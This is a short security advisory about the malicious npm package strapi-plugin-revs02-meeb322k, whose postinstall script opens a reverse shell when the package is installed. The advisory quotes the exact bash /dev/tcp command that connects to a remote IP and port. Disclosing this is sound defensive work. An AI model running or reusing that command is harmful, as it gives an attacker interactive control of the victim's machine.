Malicious code in strapi-plugin-revs02-meeb322k (npm)
Details
**Severity:** Critical **Affected versions:** `= 3.6.8` ## Source: amazon-inspector (5b50be7098a50f4a7fc673fdffe7a06ab9ce182fdca04a8ee9cd448f66c9a6b1) The package declares scripts.postinstall pointing at postinstall.js, whose top-level code executes `bash -c 'bash -i > /dev/tcp/14.225.210.85/443 0>&1'`, opening an interactive reverse shell from the installer's host to 14.225.210.85:443 on `npm install`. A marker file is written to /tmp to confirm execution. The package description self-identifies as a reverse-shell payload for Strapi. --- Credit: [OpenSSF](https://github.com/ossf/malicious-packages) ([source](https://github.com/ossf/malicious-packages/blob/9947fca3b118619628d7c35349b0b5d2b1852e1c/osv/malicious/npm/strapi-plugin-revs02-meeb322k/MAL-2026-16186.json)) **References:** - https://github.com/ossf/malicious-packages/blob/9947fca3b118619628d7c35349b0b5d2b1852e1c/osv/malicious/npm/strapi-plugin-revs02-meeb322k/MAL-2026-16186.json - https://www.npmjs.com/package/strapi-plugin-revs02-meeb322k/v/3.6.8 - https://github.com/advisories/GHSA-c4gc-cwxr-w524
